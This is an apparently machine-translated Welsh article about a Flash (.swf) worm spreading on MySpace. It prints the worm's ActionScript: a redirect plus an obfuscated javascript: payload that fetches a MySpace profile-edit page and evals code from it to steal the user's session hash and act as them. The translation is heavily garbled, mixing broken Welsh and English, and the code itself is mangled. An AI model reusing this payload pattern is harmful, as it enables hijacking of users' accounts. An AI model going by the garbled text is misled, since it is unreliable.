MySpace heintiwyd at Fflachia seiliedig (swf) abwyd a yn chwalu 'n chwyrn drwo MySpace. Dydy embedding JavaScript chyfundrefn i mewn i ddefnyddwyr' profiles a redirects hymwelwyr at safle yn arddel 'r U.S. llywodraeth was ar �l 'r 9 /11 terrorist byliau, Symantec rhybuddiedig Monday. Hagen bo jyst 'r blaen chan 'r rewfryn. Ad' s chymer drem am fel gweithia at ddeall fel all bod 'n esmwyth modified at danfon lawer yn anialu payloads.

'r 'n ddienwir abwyd isn't 'n faleisus namyn 'r Shockwave Fflachia .swf) ffeilia yn amgyffred 'r payload embeds JavaScript i mewn i 'r profile chan unrhyw MySpace ddefnyddiwr a golygfeydd 'r.swf ffeilia. Hon all 'n esmwyth replicate Samy ydy 'm chyfaill abwyd heb yn torri chwys.

Hon javascript chyfundrefn would 'na bod cyfieithedig at unrhyw ddefnyddiwr a gofwyedig 'r safle, yn caniat�u 'n deimladwy data at bod ddygedig, 'n gyfryw fel a hash brisio gofynedig at arwain i maes goruchwyliaethau fel ddefnyddiwr, a yn cyflawni goruchwyliaethau dros a ddefnyddwyr ( heb chydsynia 'n amlwg). 'n rhedegol, a acses arferir ond at chwala 'r JavaScript chyfundrefn at arall profiles acha 'r 'n boblogaidd 'n gymdeithasol rhwydwaith safle.

Ai 'r payload ydy 'n faleisus, all arwain i maes secondary byliau cara targeting 'n ddiweddar discovered vulnerabilities yn cymryd arno Microsoft Swydd bodlona. 'r impact would bod lawer 'n uwch yn arddangos hyd yn oed 'n deimladwy gwybodaeth acha 'ch 'n anawdd - choeten.

Ad' s chymer drem am 'r abwyd, ddiolch at hymchwil at kinematic.theory:

Pryd gofwyaist an eisoes heintiedig dudalen, mae ffagl gwrthddadlau embedded (" redirect.swf ") a contains 'r actionscript:
getURL (" url");

Agora a redirects 'ch at 'r benedig blog URL.

Acha hon blog url mae arall fflachia ffeilia embedded "retrievecookie.swf". Amgyffreda:

getURL("javas\n\rcript: var x = 'n grai ActiveXObject'Msxml2.XMLHTTP'x.open'GET','http () (: /editprofile.myspace.com / dangoseg.cfm? /fuseactionuser.HomeCommentsfriendID93634373',truex.onreadystatechangefunctionif= &=);= ) (x.readyState4var==) pgx.responseTextvar= scpg.substringpg.indexOf'BX= (( -'3,pg.indexOf')+ ( -EX'whilesc.indexOf')) (((
\')!=-1)||(sc.indexOf(\'-XXX\')!=-1var)) nsc.indexOf'= (
'ifn) (== -1nsc.indexOf')= ( -XXX'scsc.substring0,nsc.substringn5,sc.length);= )+ (+) " + " evalsc ) " + " x.sendnull ) ", " ")

Agora arall blog bostio (ddolen) a evaluates 'i chynhwysiad.

Hon chyfundrefn gets 'ch MySpace hash a allows hunrhywun at actia fel 'ch acha MySpace a chyflawna unrhyw goruchwyliaethau acha 'ch achos cara yn cyfnewid 'ch password ai yn adio rhywun 'n anadnabyddus fel 'ch chyfaill, ddim alli gwna acha MySpace. 'n rhedegol 'r chyfundrefn adds cenadwri at 'ch MySpace profile. 'i 'n helaeth arfer AJAX achos 'i goruchwyliaethau.